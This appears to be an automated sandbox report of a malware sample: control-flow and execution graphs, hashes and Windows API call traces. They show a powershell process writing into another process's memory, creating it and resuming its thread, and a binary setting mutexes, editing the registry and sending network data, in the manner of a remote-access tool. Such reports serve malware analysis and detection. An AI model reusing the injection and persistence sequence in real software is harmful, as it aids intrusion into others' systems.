                                                                                                    • Instruction Fuzzy Hash: CC41E631D0DB888FDB15EF5898592A8BBF0EF69711F0441AFD089D7292CB745845CB86

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 743 7ff8485cc190-7ff8485cc210 746 7ff8485cc212-7ff8485cc217 743->746 747 7ff8485cc21a-7ff8485cc25f WriteProcessMemory 743->747 746->747 748 7ff8485cc267-7ff8485cc291 747->748 749 7ff8485cc261 747->749 749->748
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: d2238e436ee4781887329154e5c63288301329dc5fe047a0abc846b77f42e5e4
                                                                                                    • Instruction ID: 93f4a612584d7a6a2a75f16834ae4cb293891ddac8068a4c3b7ae26c2644865d
                                                                                                    • Opcode Fuzzy Hash: d2238e436ee4781887329154e5c63288301329dc5fe047a0abc846b77f42e5e4
                                                                                                    • Instruction Fuzzy Hash: 9C31D43190CB588FDB18DF58D8456E97BF0FB99311F04426FE089D3252DB74A849CB96

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 750 7ff8485cbc34-7ff8485cbce1 CreateProcessW 752 7ff8485cbce3 750->752 753 7ff8485cbce9-7ff8485cbd11 750->753 752->753 755 7ff8485cbd13-7ff8485cbd6d call 7ff8485cbd76 753->755 756 7ff8485cbd6e-7ff8485cbd75 753->756 755->756
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: dc772149b4b42eb43eb57a65032273047caca76161b091d10fcc92cfa1a6712d
                                                                                                    • Instruction ID: e9b10d27b6ae81013607d84d7d4ed0d7f9834a6799aaef50cd5427a1c649f4ad
                                                                                                    • Opcode Fuzzy Hash: dc772149b4b42eb43eb57a65032273047caca76161b091d10fcc92cfa1a6712d
                                                                                                    • Instruction Fuzzy Hash: 79415E3191CB588FEB55DF18D846BEDB7F0FB99310F1042AAD04DA7251DA34A986CF82

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 762 7ff8485cc295-7ff8485cc2a1 763 7ff8485cc2a3-7ff8485cc2ab 762->763 764 7ff8485cc2ac-7ff8485cc339 ResumeThread 762->764 763->764 767 7ff8485cc341-7ff8485cc35d 764->767 768 7ff8485cc33b 764->768 768->767
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0
                                                                                                    • Opcode ID: 05e2fdae08af19b01dbdc522fc13b646b7a269e18f0b67f064a5fa711be8d88a
                                                                                                    • Instruction ID: 786e1efa76400d6ac65f0100240cc1bf4e29d055bf39be3ff86d9faa704fe885
                                                                                                    • Opcode Fuzzy Hash: 05e2fdae08af19b01dbdc522fc13b646b7a269e18f0b67f064a5fa711be8d88a
                                                                                                    • Instruction Fuzzy Hash: 1231D13190CA4C9FDB59DB68D84ABA9BBF0FF56321F04426FD049C3652DB616415CB81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2373782689.00007FF848690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848690000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff848690000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b67c1da37fdcb911f9dd98869309e05aa4529b2a289eb29c982875d4e17d3d89
                                                                                                    • Instruction ID: 483bc58982c6441c495f41e5900f2c84a8e58436f8c20fbda210385d3b0bd8c9
                                                                                                    • Opcode Fuzzy Hash: b67c1da37fdcb911f9dd98869309e05aa4529b2a289eb29c982875d4e17d3d89
                                                                                                    • Instruction Fuzzy Hash: AC51CE31A1CA8E8FEBE8BE1898496B577E1FF54394F554179D40C8B1C2CB25EC41CAC6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1225 7ff8486953da-7ff8486953e6 1227 7ff848695524-7ff84869552e 1225->1227 1228 7ff8486953ec-7ff848695423 1225->1228 1230 7ff848695530-7ff84869553c 1227->1230 1231 7ff84869553d-7ff8486955dd 1227->1231 1238 7ff848695425-7ff848695445 1228->1238 1239 7ff848695447 1228->1239 1257 7ff848695608-7ff848695635 1231->1257 1258 7ff8486955df-7ff848695606 1231->1258 1241 7ff848695449-7ff84869544b 1238->1241 1239->1241 1241->1227 1243 7ff848695451-7ff848695454 1241->1243 1246 7ff848695456-7ff848695469 1243->1246 1247 7ff84869546b 1243->1247 1248 7ff84869546d-7ff84869546f 1246->1248 1247->1248 1248->1227 1251 7ff848695475-7ff8486954af 1248->1251 1264 7ff8486954b1-7ff8486954be 1251->1264 1265 7ff8486954c8-7ff8486954ce 1251->1265 1267 7ff848695637 1257->1267 1268 7ff848695638-7ff848695649 1257->1268 1258->1257 1264->1265 1275 7ff8486954c0-7ff8486954c6 1264->1275 1270 7ff8486954d0-7ff8486954e8 1265->1270 1271 7ff8486954ea-7ff8486954ed 1265->1271 1267->1268 1273 7ff84869564b 1268->1273 1274 7ff84869564c-7ff84869569a 1268->1274 1270->1271 1276 7ff8486954f4-7ff8486954fd 1271->1276 1273->1274 1275->1265 1279 7ff848695516-7ff848695523 1276->1279 1280 7ff8486954ff-7ff848695514 1276->1280 1280->1279
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2373782689.00007FF848690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848690000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff848690000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5eba6490f595059b79a2754c9dd09bf105429f5e84e94aba1cd1012f20e81c00
                                                                                                    • Instruction ID: 6cac191c89f4fefb9c86fdfcae297db7b9813ff9777ecf527aca48fee2eb1ae8
                                                                                                    • Opcode Fuzzy Hash: 5eba6490f595059b79a2754c9dd09bf105429f5e84e94aba1cd1012f20e81c00
                                                                                                    • Instruction Fuzzy Hash: CF41B322D1FE875FF7DAAA28185D2786AD3FF55799F9800B9D40DC71D3EE08A8054206
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.2372991228.00007FF8485C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8485C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_7ff8485c0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 36204ad988c58d6fce3d105264f8cd644e88139f60f05467246ebc71b243abff
                                                                                                    • Instruction ID: 47b226d768176dbca7156d434a83a183cd3d8df4366538324c2730cb6eb1a041
                                                                                                    • Opcode Fuzzy Hash: 36204ad988c58d6fce3d105264f8cd644e88139f60f05467246ebc71b243abff
                                                                                                    • Instruction Fuzzy Hash: DE52F932D0DA8A4FEB45EB6C9C955E93BE0FF61794F0A02B7C058C7193DB146846CB94

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:6.4%
                                                                                                    Total number of Nodes:1203
                                                                                                    Total number of Limit Nodes:55
                                                                                                    execution_graph 45896 42d6a2 45897 42d6ad 45896->45897 45898 42d6c1 45897->45898 45900 430ca3 45897->45900 45901 430cb2 45900->45901 45902 430cae 45900->45902 45904 43b6c1 45901->45904 45902->45898 45905 443697 45904->45905 45906 4436a4 45905->45906 45907 4436af 45905->45907 45917 443649 45906->45917 45909 4436b7 45907->45909 45915 4436c0 __Getctype 45907->45915 45924 443c92 20 API calls _free 45909->45924 45911 4436c5 45925 43ad91 20 API calls _Atexit 45911->45925 45912 4436ea HeapReAlloc 45913 4436ac 45912->45913 45912->45915 45913->45902 45915->45911 45915->45912 45926 440480 7 API calls 2 library calls 45915->45926 45918 443687 45917->45918 45922 443657 __Getctype 45917->45922 45928 43ad91 20 API calls _Atexit 45918->45928 45920 443672 RtlAllocateHeap 45921 443685 45920->45921 45920->45922 45921->45913 45922->45918 45922->45920 45927 440480 7 API calls 2 library calls 45922->45927 45924->45913 45925->45913 45926->45915 45927->45922 45928->45921 45929 424a00 45934 424a7d send 45929->45934 45935 41bd72 45937 41bd87 ctype ___scrt_fastfail 45935->45937 45936 41bf8a 45942 41bf3e 45936->45942 45949 41b917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 45936->45949 45937->45936 45939 430c79 21 API calls 45937->45939 45941 41bf37 ___scrt_fastfail 45939->45941 45940 41bf9b 45940->45942 45950 430c79 45940->45950 45941->45942 45944 430c79 21 API calls 45941->45944 45947 41bf64 ___scrt_fastfail 45944->45947 45945 41bfd4 ___scrt_fastfail 45945->45942 45955 4312ff 45945->45955 45947->45942 45948 430c79 21 API calls 45947->45948 45948->45936 45949->45940 45951 430c83 45950->45951 45952 430c87 45950->45952 45951->45945 45958 439adb 45952->45958 45967 43121e 45955->45967 45957 431307 45957->45942 45964 443649 __Getctype 45958->45964 45959 443687 45966 43ad91 20 API calls _Atexit 45959->45966 45961 443672 RtlAllocateHeap 45962 430c8c 45961->45962 45961->45964 45962->45945 45964->45959 45964->45961 45965 440480 7 API calls 2 library calls 45964->45965 45965->45964 45966->45962 45968 431237 45967->45968 45972 43122d 45967->45972 45969 430c79 21 API calls 45968->45969 45968->45972 45970 431258 45969->45970 45970->45972 45973 4315ec CryptAcquireContextA 45970->45973 45972->45957 45974 43160d CryptGenRandom 45973->45974 45975 431608 45973->45975 45974->45975 45976 431622 CryptReleaseContext 45974->45976 45975->45972 45976->45975 45977 424991 45983 424a66 recv 45977->45983 45984 440c5d 45985 440c66 45984->45985 45986 440c7f 45984->45986 45987 440c6e 45985->45987 45991 440ce5 45985->45991 45989 440c76 45989->45987 46002 440fb2 22 API calls 2 library calls 45989->46002 45992 440cf1 45991->45992 45993 440cee 45991->45993 46003 44c5bd GetEnvironmentStringsW 45992->46003 45993->45989 45996 440cfe 46012 443c92 20 API calls _free 45996->46012 45999 440d33 45999->45989 46000 440d09 46011 443c92 20 API calls _free 46000->46011 46002->45986 46004 44c5d1 46003->46004 46005 440cf8 46003->46005 46006 443649 ___crtLCMapStringA 21 API calls 46004->46006 46005->45996 46010 440e0a 26 API calls 3 library calls 46005->46010 46008 44c5e5 ctype 46006->46008 46013 443c92 20 API calls _free 46008->46013 46009 44c5ff FreeEnvironmentStringsW 46009->46005 46010->46000 46011->45996 46012->45999 46013->46009 46014 439be8 46017 439bf4 _swprintf ___scrt_is_nonwritable_in_current_image 46014->46017 46015 439c02 46030 43ad91 20 API calls _Atexit 46015->46030 46017->46015 46018 439c2c 46017->46018 46025 442d9a EnterCriticalSection 46018->46025 46020 439c37 46026 439cd8 46020->46026 46023 439c07 ___scrt_is_nonwritable_in_current_image __cftof 46025->46020 46027 439ce6 46026->46027 46029 439c42 46027->46029 46032 446c9b 36 API calls 2 library calls 46027->46032 46031 439c5f LeaveCriticalSection std::_Lockit::~_Lockit 46029->46031 46030->46023 46031->46023 46032->46027 46033 4457a9 GetLastError 46034 4457c2 46033->46034 46037 4457c8 46033->46037 46059 445ceb 11 API calls 2 library calls 46034->46059 46039 44581f SetLastError 46037->46039 46052 443005 46037->46052 46041 445828 46039->46041 46040 4457e2 46060 443c92 20 API calls _free 46040->46060 46044 4457f7 46044->46040 46046 4457fe 46044->46046 46045 4457e8 46047 445816 SetLastError 46045->46047 46062 445597 20 API calls __Getctype 46046->46062 46047->46041 46049 445809 46063 443c92 20 API calls _free 46049->46063 46051 44580f 46051->46039 46051->46047 46057 443012 __Getctype 46052->46057 46053 443052 46065 43ad91 20 API calls _Atexit 46053->46065 46054 44303d RtlAllocateHeap 46055 443050 46054->46055 46054->46057 46055->46040 46061 445d41 11 API calls 2 library calls 46055->46061 46057->46053 46057->46054 46064 440480 7 API calls 2 library calls 46057->46064 46059->46037 46060->46045 46061->46044 46062->46049 46063->46051 46064->46057 46065->46055 46066 40163e 46067 401646 46066->46067 46068 401649 46066->46068 46069 401688 46068->46069 46071 401676 46068->46071 46074 43229f 46069->46074 46073 43229f new 22 API calls 46071->46073 46072 40167c 46073->46072 46077 4322a4 46074->46077 46075 439adb ___std_exception_copy 21 API calls 46075->46077 46076 4322d0 46076->46072 46077->46075 46077->46076 46081 440480 7 API calls 2 library calls 46077->46081 46082 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46077->46082 46083 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 46077->46083 46081->46077 46084 43263c 46085 432648 ___scrt_is_nonwritable_in_current_image 46084->46085 46111 43234b 46085->46111 46087 43264f 46089 432678 46087->46089 46381 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46087->46381 46094 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46089->46094 46382 441763 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46089->46382 46091 432691 46093 432697 ___scrt_is_nonwritable_in_current_image 46091->46093 46383 441707 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46091->46383 46100 432717 46094->46100 46384 4408e7 35 API calls 6 library calls 46094->46384 46122 4328c9 46100->46122 46112 432354 46111->46112 46389 4329da IsProcessorFeaturePresent 46112->46389 46114 432360 46390 436cd1 10 API calls 4 library calls 46114->46390 46116 432365 46121 432369 46116->46121 46391 4415bf 46116->46391 46119 432380 46119->46087 46121->46087 46400 434c30 46122->46400 46125 43271d 46126 4416b4 46125->46126 46402 44c239 46126->46402 46128 432726 46131 40d3f0 46128->46131 46129 4416bd 46129->46128 46406 443d25 35 API calls 46129->46406 46408 41a8da LoadLibraryA GetProcAddress 46131->46408 46133 40d40c 46415 40dd83 46133->46415 46135 40d415 46430 4020d6 46135->46430 46138 4020d6 28 API calls 46139 40d433 46138->46139 46436 419d87 46139->46436 46143 40d445 46462 401e6d 46143->46462 46145 40d44e 46146 40d461 46145->46146 46147 40d4b8 46145->46147 46717 40e609 116 API calls 46146->46717 46468 401e45 46147->46468 46150 40d4c6 46154 401e45 22 API calls 46150->46154 46151 40d473 46152 401e45 22 API calls 46151->46152 46153 40d47f 46152->46153 46718 40f98d 36 API calls __EH_prolog 46153->46718 46155 40d4e5 46154->46155 46473 4052fe 46155->46473 46158 40d4f4 46478 408209 46158->46478 46159 40d491 46719 40e5ba 77 API calls 46159->46719 46163 40d49a 46720 40dd70 70 API calls 46163->46720 46172 401fb8 11 API calls 46173 40d520 46172->46173 46174 401e45 22 API calls 46173->46174 46175 40d529 46174->46175 46495 401fa0 46175->46495 46177 40d534 46178 401e45 22 API calls 46177->46178 46179 40d54f 46178->46179 46180 401e45 22 API calls 46179->46180 46181 40d569 46180->46181 46182 40d5cf 46181->46182 46721 40822a 46181->46721 46183 401e45 22 API calls 46182->46183 46189 40d5dc 46183->46189 46185 40d594 46186 401fc2 28 API calls 46185->46186 46187 40d5a0 46186->46187 46190 401fb8 11 API calls 46187->46190 46188 40d650 46194 40d660 CreateMutexA GetLastError 46188->46194 46189->46188 46192 401e45 22 API calls 46189->46192 46191 40d5a9 46190->46191 46726 411f34 RegOpenKeyExA 46191->46726 46193 40d5f5 46192->46193 46199 40d5fc OpenMutexA 46193->46199 46195 40d991 46194->46195 46196 40d67f GetModuleFileNameW 46194->46196 46197 401fb8 11 API calls 46195->46197 46499 4192ae 46196->46499 46224 40d99a ___scrt_fastfail 46197->46224 46203 40d622 46199->46203 46204 40d60f WaitForSingleObject CloseHandle 46199->46204 46207 411f34 3 API calls 46203->46207 46204->46203 46205 40d6a0 46208 40d6f5 46205->46208 46209 401e45 22 API calls 46205->46209 46206 40dd0f 46799 41239a 30 API calls 46206->46799 46215 40d63b 46207->46215 46211 401e45 22 API calls 46208->46211 46219 40d6bf 46209->46219 46213 40d720 46211->46213 46212 40dd22 46800 410eda 65 API calls ___scrt_fastfail 46212->46800 46216 40d731 46213->46216 46217 40d72c 46213->46217 46215->46188 46729 41239a 30 API calls 46215->46729 46221 401e45 22 API calls 46216->46221 46733 40e501 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46217->46733 46219->46208 46225 40d6f7 46219->46225 46229 40d6db 46219->46229 46231 40d73a 46221->46231 46222 402073 28 API calls 46223 40dd3a 46222->46223 46626 4052dd 46223->46626 46795 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46224->46795 46731 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 46225->46731 46228 40dd4a 46230 402073 28 API calls 46228->46230 46229->46208 46730 4067a0 36 API calls ___scrt_fastfail 46229->46730 46234 40dd59 46230->46234 46238 401e45 22 API calls 46231->46238 46237 4194da 79 API calls 46234->46237 46235 40d70d 46235->46208 46239 40d712 46235->46239 46236 40d9ec 46240 401e45 22 API calls 46236->46240 46241 40dd5e 46237->46241 46242 40d755 46238->46242 46732 4066a6 58 API calls 46239->46732 46244 40da10 46240->46244 46245 401fb8 11 API calls 46241->46245 46248 401e45 22 API calls 46242->46248 46526 402073 46244->46526 46246 40dd6a 46245->46246 46628 413980 46246->46628 46251 40d76f 46248->46251 46250 40dd6f 46253 401e45 22 API calls 46251->46253 46252 40da22 46532 41215f RegCreateKeyA 46252->46532 46254 40d789 46253->46254 46258 401e45 22 API calls 46254->46258 46257 401e45 22 API calls 46259 40da44 46257->46259 46263 40d7a3 46258->46263 46538 439867 46259->46538 46262 40d810 46262->46224 46266 40d828 46262->46266 46303 40d8a7 ___scrt_fastfail 46262->46303 46263->46262 46265 401e45 22 API calls 46263->46265 46264 40da61 46796 41aa4f 81 API calls ___scrt_fastfail 46264->46796 46275 40d7b8 _wcslen 46265->46275 46268 401e45 22 API calls 46266->46268 46267 40da7e 46270 402073 28 API calls 46267->46270 46271 40d831 46268->46271 46273 40da8d 46270->46273 46277 401e45 22 API calls 46271->46277 46272 40da70 CreateThread 46272->46267 47473 41b212 10 API calls 46272->47473 46274 402073 28 API calls 46273->46274 46276 40da9c 46274->46276 46275->46262 46279 401e45 22 API calls 46275->46279 46542 4194da 46276->46542 46280 40d843 46277->46280 46283 40d7d3 46279->46283 46285 401e45 22 API calls 46280->46285 46282 401e45 22 API calls 46284 40daad 46282->46284 46286 401e45 22 API calls 46283->46286 46288 401e45 22 API calls 46284->46288 46287 40d855 46285->46287 46289 40d7e8 46286->46289 46291 401e45 22 API calls 46287->46291 46290 40dabf 46288->46290 46734 40c5ed 46289->46734 46294 401e45 22 API calls 46290->46294 46292 40d87e 46291->46292 46298 401e45 22 API calls 46292->46298 46296 40dad5 46294->46296 46302 401e45 22 API calls 46296->46302 46297 401ef3 28 API calls 46299 40d807 46297->46299 46300 40d88f 46298->46300 46301 401ee9 11 API calls 46299->46301 46792 40b871 46 API calls _wcslen 46300->46792 46301->46262 46304 40daf5 46302->46304 46516 412338 46303->46516 46309 439867 _strftime 39 API calls 46304->46309 46307 40d942 ctype 46312 401e45 22 API calls 46307->46312 46308 40d89f 46308->46303 46310 40db02 46309->46310 46311 401e45 22 API calls 46310->46311 46313 40db0d 46311->46313 46314 40d959 46312->46314 46315 401e45 22 API calls 46313->46315 46314->46236 46316 40d96d 46314->46316 46317 40db1e 46315->46317 46318 401e45 22 API calls 46316->46318 46566 408f1f 46317->46566 46319 40d976 46318->46319 46793 419bca 28 API calls 46319->46793 46322 40d982 46794 40de34 88 API calls 46322->46794 46325 401e45 22 API calls 46327 40db3c 46325->46327 46326 40d987 46326->46195 46326->46236 46328 40db83 46327->46328 46329 40db4a 46327->46329 46331 401e45 22 API calls 46328->46331 46330 43229f new 22 API calls 46329->46330 46332 40db53 46330->46332 46333 40db91 46331->46333 46334 401e45 22 API calls 46332->46334 46336 40dbd9 46333->46336 46337 40db9c 46333->46337 46335 40db65 46334->46335 46339 40db6c CreateThread 46335->46339 46338 401e45 22 API calls 46336->46338 46340 43229f new 22 API calls 46337->46340 46341 40dbe2 46338->46341 46339->46328 47474 417f6a 101 API calls 2 library calls 46339->47474 46342 40dba5 46340->46342 46345 40dc4c 46341->46345 46346 40dbed 46341->46346 46343 401e45 22 API calls 46342->46343 46344 40dbb6 46343->46344 46347 40dbbd CreateThread 46344->46347 46348 401e45 22 API calls 46345->46348 46349 401e45 22 API calls 46346->46349 46347->46336 47478 417f6a 101 API calls 2 library calls 46347->47478 46350 40dc55 46348->46350 46351 40dbfc 46349->46351 46352 40dc60 46350->46352 46353 40dc99 46350->46353 46354 401e45 22 API calls 46351->46354 46356 401e45 22 API calls 46352->46356 46603 4195f8 GetComputerNameExW GetUserNameW 46353->46603 46357 40dc11 46354->46357 46359 40dc69 46356->46359 46797 40c5a1 31 API calls 46357->46797 46363 401e45 22 API calls 46359->46363 46366 40dc7e 46363->46366 46364 40dc24 46367 401ef3 28 API calls 46364->46367 46377 439867 _strftime 39 API calls 46366->46377 46369 40dc30 46367->46369 46374 401ee9 11 API calls 46369->46374 46370 40dcc1 SetProcessDEPPolicy 46371 40dcc4 CreateThread 46370->46371 46372 40dce5 46371->46372 46373 40dcd9 CreateThread 46371->46373 47446 40e18d 46371->47446 46375 40dcfa 46372->46375 46376 40dcee CreateThread 46372->46376 46373->46372 47475 410b5c 137 API calls 46373->47475 46378 40dc39 CreateThread 46374->46378 46375->46222 46375->46246 46376->46375 47476 411140 38 API calls ___scrt_fastfail 46376->47476 46379 40dc8b 46377->46379 46378->46345 47477 401bc9 49 API calls _strftime 46378->47477 46798 40b0a3 7 API calls 46379->46798 46381->46087 46382->46091 46383->46094 46384->46100 46389->46114 46390->46116 46395 44cd48 46391->46395 46394 436cfa 8 API calls 3 library calls 46394->46121 46398 44cd61 46395->46398 46397 432372 46397->46119 46397->46394 46399 432d4b 5 API calls ___raise_securityfailure 46398->46399 46399->46397 46401 4328dc GetStartupInfoW 46400->46401 46401->46125 46403 44c24b 46402->46403 46404 44c242 46402->46404 46403->46129 46407 44c138 48 API calls 4 library calls 46404->46407 46406->46129 46407->46403 46409 41a919 LoadLibraryA GetProcAddress 46408->46409 46410 41a909 GetModuleHandleA GetProcAddress 46408->46410 46411 41a947 GetModuleHandleA GetProcAddress 46409->46411 46412 41a937 GetModuleHandleA GetProcAddress 46409->46412 46410->46409 46413 41a973 24 API calls 46411->46413 46414 41a95f GetModuleHandleA GetProcAddress 46411->46414 46412->46411 46413->46133 46414->46413 46801 419493 FindResourceA 46415->46801 46418 439adb ___std_exception_copy 21 API calls 46419 40ddad ctype 46418->46419 46804 402097 46419->46804 46422 401fc2 28 API calls 46423 40ddd3 46422->46423 46424 401fb8 11 API calls 46423->46424 46425 40dddc 46424->46425 46426 439adb ___std_exception_copy 21 API calls 46425->46426 46427 40dded ctype 46426->46427 46810 4062ee 46427->46810 46429 40de20 46429->46135 46431 4020ec 46430->46431 46432 4023ae 11 API calls 46431->46432 46433 402106 46432->46433 46434 402549 28 API calls 46433->46434 46435 402114 46434->46435 46435->46138 46862 4020bf 46436->46862 46438 401fb8 11 API calls 46439 419e3c 46438->46439 46441 401fb8 11 API calls 46439->46441 46440 419e0c 46868 404182 28 API calls 46440->46868 46444 419e44 46441->46444 46446 401fb8 11 API calls 46444->46446 46445 419e18 46448 401fc2 28 API calls 46445->46448 46447 40d43c 46446->46447 46458 40e563 46447->46458 46450 419e21 46448->46450 46449 401fc2 28 API calls 46456 419d9a 46449->46456 46451 401fb8 11 API calls 46450->46451 46453 419e29 46451->46453 46452 401fb8 11 API calls 46452->46456 46869 41ab9a 28 API calls 46453->46869 46456->46440 46456->46449 46456->46452 46457 419e0a 46456->46457 46866 404182 28 API calls 46456->46866 46867 41ab9a 28 API calls 46456->46867 46457->46438 46459 40e56f 46458->46459 46461 40e576 46458->46461 46870 402143 11 API calls 46459->46870 46461->46143 46463 402143 46462->46463 46464 40217f 46463->46464 46871 402710 11 API calls 46463->46871 46464->46145 46466 402164 46872 4026f2 11 API calls std::_Deallocate 46466->46872 46469 401e4d 46468->46469 46470 401e55 46469->46470 46873 402138 22 API calls 46469->46873 46470->46150 46474 4020bf 11 API calls 46473->46474 46475 40530a 46474->46475 46874 403280 46475->46874 46477 405326 46477->46158 46878 4051cf 46478->46878 46480 408217 46882 402035 46480->46882 46483 401fc2 46484 401fd1 46483->46484 46485 402019 46483->46485 46486 4023ae 11 API calls 46484->46486 46492 401fb8 46485->46492 46487 401fda 46486->46487 46488 40201c 46487->46488 46489 401ff5 46487->46489 46490 40265a 11 API calls 46488->46490 46914 403078 28 API calls 46489->46914 46490->46485 46493 4023ae 11 API calls 46492->46493 46494 401fc1 46493->46494 46494->46172 46496 401fb2 46495->46496 46497 401fa9 46495->46497 46496->46177 46915 4025c0 28 API calls 46497->46915 46916 419f23 46499->46916 46504 401fc2 28 API calls 46505 4192ea 46504->46505 46506 401fb8 11 API calls 46505->46506 46507 4192f2 46506->46507 46508 411f91 31 API calls 46507->46508 46510 419348 46507->46510 46509 41931b 46508->46509 46511 419326 StrToIntA 46509->46511 46510->46205 46512 41933d 46511->46512 46513 419334 46511->46513 46515 401fb8 11 API calls 46512->46515 46924 41accf 22 API calls 46513->46924 46515->46510 46517 412356 46516->46517 46518 4062ee 28 API calls 46517->46518 46519 41236b 46518->46519 46520 4020d6 28 API calls 46519->46520 46521 41237b 46520->46521 46522 41215f 14 API calls 46521->46522 46523 412385 46522->46523 46524 401fb8 11 API calls 46523->46524 46525 412392 46524->46525 46525->46307 46527 40207b 46526->46527 46528 4023ae 11 API calls 46527->46528 46529 402086 46528->46529 46925 4024cd 46529->46925 46533 4121af 46532->46533 46535 412178 46532->46535 46534 401fb8 11 API calls 46533->46534 46536 40da38 46534->46536 46537 41218a RegSetValueExA RegCloseKey 46535->46537 46536->46257 46537->46533 46539 439880 _strftime 46538->46539 46929 438bbe 46539->46929 46541 40da51 46541->46264 46541->46267 46543 4194f0 GetLocalTime 46542->46543 46544 41958b 46542->46544 46545 4052fe 28 API calls 46543->46545 46546 401fb8 11 API calls 46544->46546 46547 419532 46545->46547 46548 419593 46546->46548 46549 408209 28 API calls 46547->46549 46550 401fb8 11 API calls 46548->46550 46551 41953e 46549->46551 46552 40daa1 46550->46552 46957 402ef0 46551->46957 46552->46282 46555 408209 28 API calls 46556 419556 46555->46556 46962 41928b 76 API calls 46556->46962 46558 419564 46559 401fb8 11 API calls 46558->46559 46560 419570 46559->46560 46561 401fb8 11 API calls 46560->46561 46562 419579 46561->46562 46563 401fb8 11 API calls 46562->46563 46564 419582 46563->46564 46565 401fb8 11 API calls 46564->46565 46565->46544 46966 401f66 46566->46966 46568 408f36 _wcslen 46569 408f60 46568->46569 46570 408f49 46568->46570 46572 40c5ed 31 API calls 46569->46572 46571 40c5ed 31 API calls 46570->46571 46573 408f51 46571->46573 46574 408f68 46572->46574 46575 401ef3 28 API calls 46573->46575 46576 401ef3 28 API calls 46574->46576 46602 408f5b 46575->46602 46577 408f76 46576->46577 46578 401ee9 11 API calls 46577->46578 46579 408f7e 46578->46579 46998 4081c7 28 API calls 46579->46998 46580 401ee9 11 API calls 46582 408fb5 46580->46582 46584 408ffb 46582->46584 46585 408fdc 46582->46585 46583 408f90 46999 402ff4 46583->46999 46970 408098 46584->46970 46588 408fe1 46585->46588 46589 409013 46585->46589 46593 408098 28 API calls 46588->46593 46592 401ee9 11 API calls 46589->46592 46597 40901b 46592->46597 46594 408fef 46593->46594 47004 4092ba 29 API calls 46594->47004 46595 401ef3 28 API calls 46599 408fa5 46595->46599 46597->46325 46601 401ee9 11 API calls 46599->46601 46600 408ff9 46600->46589 46601->46602 46602->46580 47201 40415e 46603->47201 46608 402ff4 28 API calls 46609 41965d 46608->46609 46610 401ee9 11 API calls 46609->46610 46611 419666 46610->46611 46612 401ee9 11 API calls 46611->46612 46613 40dca2 46612->46613 46614 401ef3 46613->46614 46615 401f02 46614->46615 46616 401f4a 46614->46616 46617 402232 11 API calls 46615->46617 46623 401ee9 46616->46623 46618 401f0b 46617->46618 46619 401f4d 46618->46619 46621 401f26 46618->46621 46620 402316 11 API calls 46619->46620 46620->46616 47295 40303c 28 API calls 46621->47295 46624 402232 11 API calls 46623->46624 46625 401ef2 46624->46625 46625->46370 46625->46371 47296 40533f 28 API calls 46626->47296 46629 4020bf 11 API calls 46628->46629 46630 413994 46629->46630 47297 419894 